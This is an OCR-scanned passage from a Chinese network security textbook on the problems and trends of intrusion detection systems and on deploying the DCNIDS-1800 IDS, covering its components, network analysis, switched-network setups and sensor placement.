数 和 报警 事件 记录 的 性 能 参数 。 大 多 数 NIDS 报警 事件 记录 的 性 能 参数 小 于 事件 处 理 引擎 
的 性 能 参数 ,主要 是 Client/Server 结构 的 NIDS, 因 为 引入 了 网 络 通信 的 性 能 瓶颈 。 这 种 情 
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况 将 导致 事件 的 丢失 ,或 者 控制 台 响 应 不 过 来 。 
5.6 人 侵 检测 系统 的 发 展 趋势 


1. 入 侵 检 测 系 统 面临 的 主要 问题 

(D 误 报 。 误 报 是 指 被 IDS 检测 出 但 其 实 是 正常 及 合法 使 用 受 保护 网 络 和 计算 机 的 警 
报 。 假 警报 不 但 令 人 讨厌 ,并 且 降 低 入 侵 检测 系统 的 效率 。 攻 击 者 可 以 而 且 往 往 是 利用 包 
结构 伪造 无 威胁 “正常 " 假 警 报 , 以 诱 使 收受 人 把 入 侵 检测 系统 关 掉 。 

没有 一 个 人 侵 检 测 无 敌 于 误 报 , 应 用 系统 总 会 发 生 错误 ,原因 是 : 缺乏 共享 信息 的 标准 
机 制 和 集中 协调 的 机 制 ,不 同 的 网 络 及 主机 有 不 同 的 安全 问题 ,不 同 的 IDS 有 各 自 的 功能 ; 
缺乏 揣摩 数据 在 一 段 时 间 内 行为 的 能 力 ; 缺乏 有 效 跟 踪 分 析 等 。 

(2) 精巧 及 有 组 织 的 攻击 。 攻 击 可 以 来 自 四 方 八 面 ,特别 是 一 群 人 组 织 策划 且 攻 击 者 
技术 高 超 的 攻击 ,攻击 者 花费 很 长 时 间 做 准备 ,并 发 动 全 球 性 攻击 ,要 找 出 这 样 复 杂 的 攻击 
是 一 件 难事 。 

另外 ,高 速 网 络 技术 ,尤其 是 交换 技术 以 及 加 密 信道 技术 的 发 展 ,使 得 通过 共享 网 段 侦 
听 的 网 络 数据 采集 方法 显得 不 足 , 而 巨大 的 通信 量 对 数据 分 析 也 提出 了 新 的 要 求 。 

2. 入 侵 检 测 系统 的 发 展 趋势 

从 总 体 上 讲 , 目 前 除了 传统 的 技术 (模式 识别 和 完整 性 检测 ) 外 ,IDS 应 重点 加 强 与 统计 
分 析 相 关 技 术 的 研究 。 许 多 学 者 在 研究 新 的 检测 方法 ,如 采用 自动 代理 的 主动 防御 方法 ,将 
免疫 学 原理 应 用 到 人 侵 检测 的 方法 等 。 其 主要 发 展 方向 可 以 概括 为 以 下 几 点 。 

d) 分 布 式 人 侵 检测 与 CIDF。 传 统 的 IDS 一 般 局 限于 单一 的 主机 或 网 络 架构 ,对 异 构 
系统 及 大 规模 网 络 的 检测 明显 不 足 , 同 时 不 同 的 IDS 之 间 不 能 协同 工作 。 为 此 ,需要 分 布 
式 人 侵 检测 技术 与 CIDF, 

(2) 应 用 层 人 侵 检测 。 许 多 入 侵 的 语义 只 有 在 应 用 层 才 能 理解 ,而 目前 的 IDS 仅 能 检 
测 Web 之 类 的 通用 协议 ,不 能 处 理 如 Lotus Notes 数据 库 系统 等 其 他 的 应 用 系统 。 许 多 基 
F Client/Server 结构 .中 间 件 技术 及 对 象 技术 的 大 型 应 用 ,需要 应 用 层 的 入侵 检 测 保护 。 

(3) 智能 人 侵 检测 。 目 前 ,入 侵 方法 越 来 越 多 样 化 与 综合 化 ,尽管 已 经 有 智能 体系 、 神 
经 网 络 与 遗传 算法 应 用 在 入 侵 检 测 领 域 , 但 这 只 是 一 些 尝试 性 的 研究 工作 ,需要 对 智能 化 的 
入 侵 检测 系统 作 进 一 步 研究 ,以 促进 其 自学 习 与 自 适应 能 力 。 

(4) 与 网 络 安全 技术 相 结合 。 结 合 防火 墙 .PKIX、 安 全 电子 交易 (SET) 等 网 络 安全 与 
电子 商务 技术 ,提供 完整 的 网 络 安全 保障 。 

O) 建立 IDS 评价 体系 。 设 计 通 用 的 入侵 检测 测试 .评估 方法 和 平台 ,实现 对 多 种 IDS 
的 检测 ,已 成 为 当前 IDS 的 另 一 重要 研究 与 发 展 领域 。 评 价 IDS 可 从 检测 范围 .系统 资源 
占用 、 自 身 的 可 靠 性 等 方面 进行 ,评价 指标 有 能 否 保 证 自身 的 安全 、 运 行 与 维护 系统 的 开销 、 
报警 准确 率 、 负 载 能 力 以 及 可 支持 的 网 络 类 型 ,支持 的 入侵 特征 数 . 是 否 支持 IP 碎片 重组 、 
是 否 支持 TCP 流 重 组 等 。 

总 之 ,IDS 作为 一 种 主动 的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实 
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时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 人 侵 。 随 着 对 网 络 通信 技术 安全 性 的 要 求 越 
来 越 高 ,为 给 电子 商务 等 网 络 应 用 提供 可 靠 服务 ,而 由 于 IDS 能 够 从 网 络 安全 的 立体 纵深 、 
多 层次 防御 的 角度 出 发 提供 安全 服务 , 必 将 进一步 受到 人 们 的 高 度 重视 。 


5.7 人 侵 检 测 系 统 的 部 署 


以 神州 数码 DCNIDS-1800 IDS 为 例 介 绍 人 侵 检测 系统 神州 数码 的 组 件 和 部 署 。 
5.7.1 DCNIDS-1800 入 侵 检 测 系统 组 件 


DCNIDS-1800 IDS 是 自动 的 ,实时 的 网 络 入 侵 检测 和 响应 系统 , 它 采 用 了 新 一 代 的 入 
侵 检测 技术 ,包括 基于 状态 的 应 用 层 协 议 分 析 技 术 、 开 放 灵 活 的 行为 描述 代码 、 安 全 的 租 入 
式 操作 系统 ,先进 的 体系 架构 、 丰 富 完 善 的 各 种 功能 ,配合 高 性 能 专用 硬件 设备 ,是 最 先进 的 
NIDS。 它 以 不 引 人 注 目的 方式 最 大 限度 地 全 天候 地 监控 和 分 析 企 业 网 络 的 安全 问题 。 捕 
获 安全 事件 ,给 予 适当 的 响应 ,阻止 非法 的 入 侵 行 为 ,保护 企业 的 信息 组 件 。 

DCNIDS-1800 IDS 采用 多 层 分 布 式 体系 结构 ,由 控制 台 、EventCollector、LogServer, 传 
感 器 .报表 等 程序 组 件 组 成 ,如 表 5-2 所 示 。 


表 5-2 DCNIDS-1800 入 侵 检测 系统 组 件 


组 fF 说 — B 

控制 台 是 DCNIDS-1800 入 侵 检 测 系 统 的 控制 和 管理 组 件 。 它 是 一 个 基于 
Windows 的 应 用 程序 ,控制 台 提供 图 形 用 户 界面 来 进行 数据 查询 ,查看 警报 并 配 
置 传感器 。 控 制 台 有 很 好 的 访问 控制 机 制 ,不 同 的 用 户 被 授予 不 同 级 别 的 访问 
权限 ,允许 或 禁止 查询 .警报 及 配置 等 访问 。 控 制 台 ,事件 收集 器 和 传感器 之 间 
的 所 有 通信 都 进行 了 安全 加 密 

一 个 大 型 分 布 式 应 用 中 ,用户 希望 能 够 通过 单个 控制 台 完 全 管理 多 个 传感器 ,多 
许 从 一 个 中 央 点 分 发 安全 策略 ,或 者 把 多 个 传感器 上 的 数据 合并 到 一 个 报告 
去 。 用 户 可 以 通过 安装 一 个 事件 收集 器 来 实现 集中 管理 传感器 及 其 数据 。 事 件 
收集 器 还 可 以 控制 传感器 的 启动 和 停止 ,收集 传感器 日 志 信 息 , 并 且 把 相应 的 策 





控制 台 


(Console) 





EventCollector 





ono 略 发 送 传感器 ,以 及 管理 用 户 权限 .提供 对 用 户 操作 的 审计 功能 。IDS 服务 管理 
的 基本 功能 是 负责 “事件 收集 服务 ”和 “安全 事件 响应 服务 ”的 启 停 控 制 、 服 务 状 
态 的 显示 
LogServer 是 DCNIDS-1800 入 侵 检测 系统 的 数据 处 理 模块 。LogServer 需要 集 
LogServer 成 DB( 数 据 库 ) 一 起 协同 工作 。DB 是 一 个 第 三 方 数据 库 软 件 。DCNIDS-1800 


(数据 服务 器 ) 入 侵 检测 系统 7. 1 支持 微软 MSDE、SQL Server, 支 持 MySQL 和 Oracle 数据 库 ， 
根据 部 署 规模 和 需求 可 以 选择 其 中 之 一 作为 数据 库 








Sensor 部 署 在 需要 保护 的 网 段 上 ,对 网 段 上 流 过 的 数据 流 进行 检测 ,识别 攻击 特征 , 报 
(传感器 ) 告 可 疑 事件 ,阻止 攻击 事件 的 进一步 发 生 或 给 予 其 他 相应 的 响应 
Repost Report( 报 表 ) 和 查询 工具 作为 IDS 系统 的 一 个 独立 的 部 分 ,主要 完成 从 数据 库 


提取 数据 、 统 计数 据 和 显示 数据 的 功能 。Report 能 够 关联 多 个 数据 库 ,给 出 一 份 


查询 工具 
(报表 ) 和 查询 工具 | 名 的 数据 报表 。 杏 询 工具 提供 查询 安全 事件 的 详细 信息 
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5.7.2 部署 DCNIDS-1800 入 侵 检 测 系 统 


1. 传感器 

作为 一 种 NIDS. DCNIDS-1800 IDS 依赖 于 一 个 或 多 个 传感器 监测 网 络 数据 流 。 这 些 
传感器 代表 着 DCNIDS-1800 IDS 的 眼睛 。 因 此 ,传感器 在 某 些 重要 位 置 的 部 署 对 于 
DCNIDS-1800 IDS 能 否 发 挥 作用 至 关 重要 。 

2. 部 署 准备 


1) 分 析 网 络 拓 扑 图 结构 

攻击 者 可 能 会 对 网 络 中 的 任何 可 用 资源 发 起 攻击 。 分 析 网 络 拓扑 结构 对 于 定义 所 有 资 
源 是 至 关 重 要 的 。 而 且 , 定 义 想 要 保护 的 信息 和 资源 ,是 创建 一 个 传感器 部 署 计 划 的 第 一 
步 ,除非 对 网 络 拓扑 结构 有 非常 透彻 的 理解 ,否则 不 可 能 全 面 地 识别 出 需要 保护 的 所 有 网 络 

当 分 析 网 络 拓扑 结构 时 ,必须 考虑 很 多 因素 。 

CD. 数据 通过 网 络 入 口 点 进入 网 络 , 所 有 这 些 点 都 有 可 能 被 攻击 者 利用 ,在 这 些 潜在 位 
置 获取 网 络 的 访问 权限 。 

@ 需要 验证 每 一 个 人 口 点 都 得 到 了 严密 的 监视 。 

© 如 果 没 有 对 进入 网 络 的 入口 点 进行 监视 ,就 会 允许 攻击 者 穿 透 未 被 IDS 保护 的 
网 络 。 

大 多 数 网 络 的 常见 人 口 点 包括 以 下 几 个 。 

(1) Internet 人口 点 。 网 络 的 Internet 连接 使 得 网 络 对 于 整个 Internet 都 是 可 见 的 。 
通过 这 个 人 口 点 ,全 世界 的 黑客 都 可 以 尝试 获得 对 我 们 网 络 的 访问 权 。 对 于 大 多 数 企 业 网 
络 来 讲 , 对 Internet 的 访问 是 直接 通过 一 台 路 由 器 进行 的 。 这 人 台 设 备 称 为 边界 路 由 器 
(Perimeter Router)。 通 过 在 这 台 设 备 后面 放 置 一 个 传感器 ,就 可 以 监视 流向 企业 网 络 的 全 
部 数据 流 ( 其 中 包括 攻击 数据 流 )。 如 果 网 络 包含 多 个 边界 路 由 器 ,就 可 能 需要 使 用 多 个 传 
感 器 ,每 个 传感器 负责 监视 进入 网 络 的 每 一 个 Internet 入 口 点 。 

(2) Extranet 人 口 点 。 许 多 企业 网 络 都 有 到 商业 伙伴 网 络 的 特殊 连接 。 来 自 这 些 商 业 
伙伴 网 络 的 数据 流 并 不 总 是 通过 网 络 的 边界 设备 ; 因此 ,重要 的 是 要 确定 这 些 入 口 点 也 被 
有 效 地 进行 监视 。 攻 击 者 可 以 通过 穿 透 商业 伙伴 的 网 络 ,利用 Extranet 来 渗透 到 用 户 网 络 
中 。 通 常 ,对 商业 伙伴 网 络 的 安全 只 能 进行 极 少 的 控制 ,或 者 根本 不 能 进行 控制 。 而 且 , 如 
果 攻 击 者 穿 透 了 用 户 网 络 ,然后 利用 Extranet 连接 来 攻击 用 户 一 个 商业 伙伴 ,用 户 就 可 能 
面临 承担 责任 的 问题 。 

(3) Intranet 隔离 点 。Intranet 代表 网 络 中 的 内 部 各 部 分 。 这 些 部 分 可 能 是 按照 机 构 
或 者 功能 划分 的 。 有 时 ,网 络 中 的 不 同 部 门 可 能 会 有 不 同 的 安全 需求 ,这 取决 于 他 们 需要 访 
问 或 保护 的 数据 和 资源 。 通 常 , 这 些 内 部 部 分 已 经 被 防火 墙 隔 离开 了 ,在 不 同 的 网 络 之 间 划 
分 不 同 的 安全 级 别 。 有 时 ,网 络 管理 者 使 用 网 段 之 间 的 路 由 器 访问 控制 列表 (ACL) 来 强制 
分 离 出 安全 区 域 。 在 这 些 网 络 之 间 放 置 一 个 传感器 (在 防火 墙 或 路 由 器 的 前 面 ) ,可 以 监视 
分 离 的 安全 区 域 之 间 的 数据 流 , 并 验证 是 否 符合 定义 的 安全 策略 。 

有 时 ,人 们 可 能 还 想 在 相互 间 具有 完全 访问 权限 的 网 段 之 间 安 装 一 个 传感器 。 在 这 种 
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情况 下 , 想 让 传感器 监视 不 同 网 络 之 间 的 数据 流 类 型 ,即使 在 默认 情况 下 ,还 没有 对 数据 流 
建立 任何 物理 屏障 。 但 是 ,这 两 个 网 络 之 间 的 任何 攻击 者 都 可 以 被 很 快 地 检测 出 来 。 

(4) 远程 访问 人 口 点 。 大 多 数 网 络 都 提供 了 一 种 方式 ,可 以 通过 一 条 拨号 电话 线 访 问 
网 络 。 这 种 接 入 方式 可 以 允许 企业 的 用 户 访问 网 络 的 某 些 功能 ,如 在 离开 办 公 室 的 时 候 收 
发 电子 邮件 。 虽 然 这 种 增强 的 功能 非常 有 用 ,但 是 它 同 时 也 为 攻击 者 打开 了 一 个 可 以 利用 
的 漏洞 。 需 要 使 用 一 个 传感器 来 监视 来 自 远程 接 人 服务 器 的 网 络 数据 流 , 以 防 黑客 攻破 用 
户 的 远程 访问 认证 机 制 。 

许多 远程 用 户 使 用 家 庭 系统 ,通过 高 速 Internet 连接 ,如 电缆 调制 解 调 器 ,进行 不 断 线 
的 连接 。 由 于 这 些 系统 的 保护 措施 通常 很 少 ,攻击 者 经 常 以 这 些 家 庭 系 统 作为 目标 ,并 发 动 
攻击 ,这样 还 会 对 远程 访问 机 制 带 来 危害 。 即 使 信任 用 户 和 远程 访问 机 制 , 最 好 还 是 利用 
IDS 传感器 对 远程 接 和 人 服务 器 进行 监视 。 

2) 关键 网 络 组 件 

确定 网 络 上 的 关键 组 件 , 对 于 综合 分 析 网 络 拓扑 是 非常 关键 的 。 黑 客 通常 以 查看 到 关 
键 网 络 组 件 为 目的 。 如 果 关 键 组 件 的 安全 受到 威胁 ,就 将 为 整个 网 络 带 来 巨大 的 安全 隐患 。 
需要 在 整个 网 络 中 采用 传感器 ,来 确保 可 以 检测 到 对 这 些 关 键 组件 发 动 的 攻击 ,并 在 一 定 条 
件 下 ,通过 阻塞 (也 被 称 为 设备 管理 ) 来 终止 这 些 攻击 。 注 意 ,阻塞 是 指 IDS 传感器 可 以 动 
态 更 新 路 由 器 上 的 访问 控制 列表 ,来 阻塞 来 自 一 台 攻 击 主机 的 当前 和 未 来 的 数据 流 , 防 止 这 
些 数据 流 进入 到 路 由 器 中 。 

关键 组 件 分 为 下 列 几 类 。 

(1) 服务 器 。 网 络 服务 器 代表 了 网 络 中 的 骨干 设备 。 服 务 器 提供 的 典型 服务 包括 名 字 
解析 、 认 证 电子 邮件 和 企业 的 网 页 。 对 这 些 有 价值 的 网 络 组 件 的 访问 进行 监视 ,对 于 一 个 
综合 的 安全 策略 来 说 是 非常 关键 的 。 

在 一 个 典型 的 网 络 上 存在 许多 服务 器 。 一 些 常 见 的 服务 器 有 DNS 服务 器 `.DHCP 服 
务 器 .HTTP JR 34 , Windows 域 控 制 台 、CA 服务 器 .电子 邮件 服务 器 及 NFS 服务 器 。 

(2) 基础 设施 。 网 络 基础 设施 是 指 那些 在 网 络 上 的 主机 之 间 传 送 数据 或 数据 包 的 设 
备 。 常 见 的 基础 设备 包括 路 由 器 、 交 换 机 、 网 关 和 集线器 。 如 果 没 有 这 些 设备 ,网 络 上 的 每 
台 主 机 都 会 成 为 互相 隔离 的 实体 ,互相 之 间 不 能 进行 通信 。 

路 由 器 在 不 同 的 网 段 之 间 传 送 数据 流 。 当 路 由 器 停止 工作 时 ,互相 连接 的 网 络 之 间 
的 数据 流 也 就 停止 流动 了 。 我 们 的 网 络 可 能 是 由 几 个 内 部 路 由 器 和 一 个 或 多 个 边界 路 
由 器 组 成 的 。 交 换 机 在 位 于 相同 网 段 的 主机 之 间 传 送 数据 流 。 交 换 机 通过 只 向 交换 机 
上 的 特定 端口 发 送 非 广播 数据 流 , 提 供 了 最 小 的 安全 性 。 如 果 交 换 机 被 禁用 , 它 就 会 停 
止 发 送 数据 流 ,导致 拒绝 服务 。 在 其 他 情况 下 ,交换 机 可 能 会 在 开放 状态 下 失效 。 在 这 
种 开放 状态 下 ,交换 机 向 其 上 的 每 个 端口 都 发 送 所 有 网 络 数据 包 , 实 际 上 将 交换 机 变 成 了 
一 个 集线器 。 

注意 : 集线器 也 在 位 于 相同 网 络 上 的 主机 之 间 传 送 数 据 流 。 但 是 ,与 交换 机 不 同 的 是 ， 
集线器 将 全 部 数据 流传 送 到 交换 机 上 的 每 个 端口 。 这 样 不 仅 会 产生 性 能 问题 ,还 会 降低 网 
络 的 安全 性 ,因为 这 样 做 就 允许 网 段 上 的 任何 主机 都 可 以 监听 流向 网 络 上 其 他 主机 的 数 
据 流 。 

(3) 安全 组 件 。 安 全 组 件 通 过 限制 数据 流 并 监视 针对 网 络 的 攻击 ,增强 了 网 络 的 安全 
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性 。 常 见 的 安全 设备 包括 防火 墙 \IDS 传感器 .IDS 管理 设备 以 及 具有 访问 控制 列表 的 路 
由 器 。 

防火 墙 在 多 个 网 络 之 间 建 立 了 一 道 安全 屏障 。 通 常 ,安装 防火 墙 来 保护 内 部 网 络 ,防止 
非 授 权 访 问 ,这 就 使 得 它们 成 为 主要 的 攻击 目标 。 

类 似 地 ,IDS 组 件 持续 地 监视 网 络 , 寻 找 攻 击 的 标记 。 黑 客 们 不 断 寻 求 新 的 方法 。 来 迷 
惑 并 破坏 常见 的 IDS 操作。 通过 禁用 IDS, 黑 客 可 以 穿 透 网 络 ,而 不 会 被 发 现 (不 会 触发 代 
表 网 络 正 在 遭受 攻击 的 警报 ) 。 

3) 远程 网 络 

许多 网 络 都 是 由 一 个 企业 中 心 网 络 和 多 个 通过 WAN 与 企业 网 络 进行 通信 的 远程 办 公 
室 组 成 。 在 网 络 分 析 中 ,需要 考虑 这 些 远程 设备 的 安全 性 。 根 据 这 些 远 程 节点 的 安全 状况 ， 
可 能 需要 放置 一 个 传感器 来 监视 穿越 WAN 链 路 的 数据 流 。 有 时 候 , 远 程 设 备 具 有 到 
Internet 的 独立 连接 ,显然 所 有 的 Internet 连接 都 需要 被 监视 。 

A) 网 络 大 小 和 复杂 度 。 网 络 越 复 杂 ,就 越 需要 在 网 络 中 的 不 同位 置 设置 多 个 传感器 。 
一 个 大 的 网 络 通常 要 求 使 用 多 个 传感器 ,这 是 因为 每 个 传感器 都 受 限 于 它 可 以 监视 的 最 大 
数据 流量 。 如 果 Internet 网 络 连接 是 一 条 几 千 兆 比 特 的 链 路 , 当 Internet 连接 满 负 载 传送 
网 络 数据 流量 时 ,目前 一 个 传感器 就 没有 能 力 处 理 全 部 的 数据 流 。 

(2) 考虑 安全 策略 限制 。 有 时 把 传感器 放置 在 网 络 中 ,以 此 验证 是 否 符合 定义 的 安全 
策略 。 关 于 它 的 一 个 很 好 的 应 用 实例 是 ,在 防火 墙 的 内 部 和 外 部 各 放置 一 个 传感器 。 外 部 
的 传感器 负责 监视 所 有 流向 被 保护 网 络 的 数据 流 。 它 检测 所 有 发 送 到 被 保护 网 络 的 攻击 和 
那些 离开 被 保护 网 络 的 数据 流 , 因 为 防火 墙 可 以 防止 其 中 的 大 部 分 攻击 ; 内 部 的 传感器 监 
视 所 有 内 部 数据 流 , 也 就 是 那些 从 外 部 成 功 穿 过 防火 墙 的 数据 流 以 及 内 部 主机 产生 的 数 
据 流 。 

3. 部 署 环境 

DCNIDS-1800 IDS 引入 了 两 种 类 型 的 安装 方式 : 独立 安装 (Stanalone) ,安装 所 有 管理 
组 件 在 一 台 机 器 上 ; 分 布 式 安装 (Distributed) ,可 选择 将 DCNIDS-1800 IDS 的 各 个 管理 组 
件 安装 在 多 台 计 算 机 上 。 

所 选 的 安装 方式 取决 于 拥有 的 传感器 的 数目 ,以 及 计划 对 它们 进行 部 署 的 方式 。 在 安 
装 DCNIDS-1800 IDS 组 件 之 前 ,应 检查 安装 环境 ,以 确定 安装 方式 。 

下 面 是 在 不 同 环境 下 可 能 采用 的 几 种 部 署 案例 。 

CD 部 署 案例 一 (1 一 5 个 传感器 ,孤立 式 安装 在 一 台 计 算 机 上 ) 。 

© 部 署 案例 二 (6 一 10 个 传感器 ,分 布 式 安装 ,分 布 在 两 台 计 算 机 上 ) 。 

© 部 署 案例 三 (11 一 30 个 传感器 ,分 布 式 安装 ,分 布 在 4 台 计算 机 上 ) 。 

D 部 署 案例 四 (多 于 30 个 传感器 ,分布 式 安装 ,分布 在 6 台 计 算 机 上 ) 。 

提醒 : 这 些 案例 中 所 提 到 的 传感器 数目 都 是 估计 值 。 实 际 使 用 的 安装 方式 由 于 和 网 络 
拓扑 、 采 用 的 安全 策略 ,每 秒 检测 到 的 安全 事件 .机 器 的 硬件 配置 等 相关 ,所 以 在 传感器 数目 
方面 可 能 稍 有 不 同 。 

1) 共享 网 络 环境 

在 非 交 换 式 网 络 中 ,即使 通话 的 目的 地 不 是 网 络 传 感 器 , 它 也 能 检测 到 所 有 的 通信 。 网 
络 传感器 所 监测 的 接口 处 于 混杂 模式 ,这 就 意味 着 它 会 接收 所 有 数据 包 ,而 不 考虑 它们 的 目 
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标 地 址 。 在 一 般 情况 下 ,网 络 接口 会 放弃 所 有 不 是 目的 地 或 者 不 是 发 向 广播 地 址 的 数据 包 。 
混杂 模式 允许 网 络 传感器 看 到 网 络 上 所 有 设备 之 间 的 所 有 通信 ,网 络 部 署 拓扑 如 图 5-7 所 示 。 

2) 交换 式 网 络 环境 

在 交换 式 网 络 中 ,通信 被 交换 机 分 隔 开 ,并 且 根 据 接口 的 MAC 地 址 选择 路 由 。 这 一 配 
置 控制 了 每 一 接口 所 接收 的 通信 量 。 如 果 与 其 他 形式 的 流量 管理 方式 结合 使 用 ,交换 式 网 
络 配置 将 是 一 种 有 效 的 带宽 控制 方式 , 它 能 够 提高 每 一 设备 的 通信 过 程 的 效率 。 

因为 由 交换 机 管理 业务 ,设置 一 个 混杂 模式 的 接口 也 无 法 控制 它 能 还 是 不 能 看 到 哪些 
业务 ,这 实际 上 有 效 地 “屏蔽 "了 网 络 传感器 .数据 包 传感器 或 依赖 于 混杂 模式 进行 操作 的 任 
何其 他 设备 。 

为 了 解决 这 一 问题 ,必须 设置 一 个 可 管理 的 交换 机 , 它 能 够 将 所 有 通信 镜像 到 选 定 的 一 
个 或 多 个 端口 。 这 在 交换 机 管理 中 称 为 spanning 或 mirroring, 

A) 交换 环境 部 署 一 。 在 交换 机 和 路 由 器 之 间接 人 一 个 集线器 ,从 而 把 一 个 交换 环境 
转换 为 共享 环境 。 这 样 做 的 优点 是 简单 易 行 、 成 本 低廉 。 如 果 客 户 对 网 络 的 传输 速度 和 可 
靠 性 要 求 不 高 ,建议 采用 这 种 方式 ,网 络 部 署 拓扑 如 图 5-8 所 示 。 


路 由 器 





5-7 ”共享 网 络 IDS 部 署 拓扑 5-8 ”交换 环境 网 络 部 署 拓扑 一 


(2) 交换 环境 部 署 二 。 如 果 交 换 机 支持 端口 镜像 的 功能 ,建议 采用 这 种 方式 ,可 以 在 不 
改变 原 有 网 络 拓扑 结构 的 基础 上 完成 传感器 的 部 署 。 它 的 优点 是 配置 简单 .灵活 ,使 用 方 
便 , 不 需要 中 断 网 络 ,是 比较 常用 的 一 种 方式 。 网 络 部 署 拓扑 如 图 5-9 所 示 。 

(3) 交换 环境 部 署 三 。 如 果 交 换 机 不 支持 端口 镜像 功能 ,或 者 出 于 性 能 的 考虑 不 便 启 
用 该 功能 ,可 以 采用 Tap( 分 线 器 )。 它 的 优点 是 能 够 支持 全 双 工 100Mb/s 或 者 全 双 工 
1000Mb/s 的 网 络 流量 。 网 络 部 署 拓扑 如 图 5-10 所 示 。 

(4) 全 宛 余 的 高 可 用 性 部 署 。 在 这 种 情况 下 ,任何 一 个 传感器 或 者 链 路 发 生 故 障 , 都 不 
会 中 断 对 网 络 的 实时 监测 。 网 络 部 署 拓扑 如 图 5-11 所 示 。 

(5) 不 对 称 路 由 情况 下 的 部 署 。 在 这 种 情况 下 ,如果 采用 两 台 传感器 分 别 部 署 在 不 同 
的 交换 机 上 是 无 法 检测 到 攻击 的 ,因为 基于 状态 的 IDS 产品 必须 监听 到 一 个 会 话 全 部 的 双 
向 流量 ,才能 判别 是 否 有 攻击 发 生 。 新 一 代 的 DCNIDS-1800 入 侵 检 测 系 统 采用 多 端口 融合 
和 关联 分 析 技 术 ,能 够 合并 一 台 传 感 器 的 不 同 网 卡 上 监测 到 的 流量 ,作出 综合 的 分 析 和 判 
断 。 网 络 部 署 拓扑 如 图 5-12 所 示 。 
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图 $-9 交换 环境 部 署 拓扑 二 图 5-10 交换 环境 部 署 拓扑 三 
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5-11 全 宛 余 的 高 可 用 性 部 署 拓扑 
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图 5-12 ”不 对 称 路 由 情况 下 的 部 署 拓扑 
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4. 传感器 部 署 位 置 

在 完全 理解 了 网 络 资源 和 拓扑 图 结构 之 后 ,就 可 以 开始 在 网 络 中 设置 传感器 的 位 置 了 。 
在 理想 情况 下 ,网 络 分 析 应 该 已 经 指明 了 我 们 认为 需要 传感器 的 区 域 。 如 果 这 样 的 话 , 那 就 最 
好 不 过 了 ,就 可 以 开始 决定 我 们 需要 的 传感器 配置 的 类 型 。 如 果 还 不 能 确定 在 哪里 放置 传 感 
器 ,也 不 必 担 心 。 虽 然 每 个 网 络 都 是 独一无二 的 ,但 是 系统 管理 员 还 是 可 以 选择 几 个 常见 的 传 
感 器 部 署 位 置 。 这 些 位 置 集 中 在 一 些 常见 的 功能 边界 ,图 5-13 详细 介绍 这 些 常见 的 部 署 位 置 。 
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5-13 传感器 部 署 位 置 


(1) 边界 保护 。 传 感 器 负责 监视 网 络 的 边界 。 在 大 多 数 网 络 中 ,边界 保护 是 指 在 网 络 
和 Internet 之 间 的 链 路 。 注 意 ,一 定 要 定位 到 我 们 网 络 的 所 有 Internet 连接 。 在 很 多 时 候 ， 
管理 员 忘 记 了 远程 节点 含有 Internet 连接 。 有 时 ,网 络 中 的 各 部 门 有 他 们 自己 的 Internet 
连接 (名 立 于 公司 的 Internet 连接 ) 。 任 何 到 Internet 的 连接 都 需要 被 监视 。 网 络 拓扑 如 
图 5-14 所 示 。 

(2) 到 商业 伙伴 的 连接 (Extranets) 。 传 感 器 可 以 监视 我 们 的 网 络 和 我 们 的 商业 伙伴 网 
络 之 间 的 链 路 上 流动 的 数据 流 。 这 条 Extranet 链 路 的 安全 性 与 该 链 路 连接 的 两 个 网 络 所 
应 用 的 安全 性 同样 强壮 。 如 果 任 何 一 个 网 络 具有 安全 弱点 , 另 一 个 网 络 也 会 变 得 易 受 攻击 。 
因此 ,Extranet 连接 需要 进行 监视 。 因 为 监视 这 个 边界 的 IDS 传感器 可 以 在 任何 一 个 方向 
上 检测 到 攻击 ,所 以 可 以 考虑 与 我 们 的 商业 伙伴 共同 承担 这 个 传感器 的 费用 。 网 络 拓扑 如 
图 5-15 所 示 o 
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图 5-14 边界 保护 的 传感器 部 署 位 置 
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5-15  Extranets 的 传感器 部 署 位 置 


(3) DMZ。 通 过 在 DMZ 中 、 网 络 的 Internet 访问 节点 上 安装 网 络 传感器 ,可 以 保护 
DMZ 中 安装 的 设备 不 受 攻击 。 保 护 防 火 墙 是 非常 重要 的 ,因为 防火 墙 是 流入 内 部 网 络 的 数 
据 的 控制 点 ,并 且 常 常 是 攻击 的 最 初 目标 。 通过 向 DMZ 添加 网 络 传感器 ,就 为 网 络 外 围 的 
防护 增加 了 一 个 专用 的 设备 。 每 个 Internet 访问 点 都 应 该 包含 一 个 防火 墙 和 一 个 网 络 传 感 
器 。 网 络 拓扑 如 图 5-16 所 示 。 

(4) 在 Intranet. 上 防火 墙 的 内 部 。 通 过 在 防火 墙 内 部 安装 网 络 传感器 ,可 以 检测 到 防 
火 墙 运作 过 程 的 变化 ,并 监测 流 经 防火 墙 的 通信 。 安 装 在 防火 墙 内 部 的 网 络 传感器 能 够 确 
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保 下 列 两 点 。 

CD 防火 墙 运行 正常 ,没有 受到 破坏 ,也 没有 被 误 配 置 。 

© 穿 过 防火 墙 的 隧道 不 会 被 用 于 启动 针对 内 部 网 络 的 攻击 过 程 。 

可 以 将 该 网 络 传感器 与 DMZ 的 网 络 传感器 结合 使 用 ,评估 防火 墙 的 效力 。 例 如 ,可 以 
记录 下 两 个 网 络 传感器 检测 到 的 严重 事件 ,然后 对 这 些 事件 产生 报告 ,比较 防火 墙 内 部 与 外 
部 所 发 生 事件 的 数目 。 管 理 网 络 可 以 直接 连接 到 防火 墙 后 面 的 网 络 。 但 是 ,在 这 种 配置 中 ， 
内 部 用 户 可 以 对 DCNIDS-1800 IDS 进行 攻击 。 一 种 更 加 安全 的 安装 方法 是 将 命令 和 控制 
接口 放置 在 防火 墙 后面 的 一 个 分 离 的 接口 上 (通过 使 用 一 个 隔离 的 DMZ 接口 )。Intranet 
的 传感器 部 署 位 置 如 图 5-17 所 示 。 


~ 
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5-16 DMZ 的 传感器 部 署 位 置 5-17 Intranet 的 传感器 部 署 位 置 


(5) 在 内 部 网 络 的 关键 网 段 上 。 内 部 网 络 的 关键 性 网 段 与 重要 的 网 络 资源 息息相关 。 
网 络 攻击 的 绝 大 多 数 损失 来 自 于 组 织 机 构 内 部 所 进行 的 攻击 。 目 前 ,许多 公司 正在 采取 措 
施 ,通过 在 Intranet 上 部 署 人 侵 检测 系统 以 减少 这 一 损失 。 在 很 多 时 候 ,使 用 Intranet 将 网 
络 分 隔 成 不 同 的 功能 区 域 ,如 工程 部 、 研 究 部 .财务 部 、 人 力 资源 部 。 

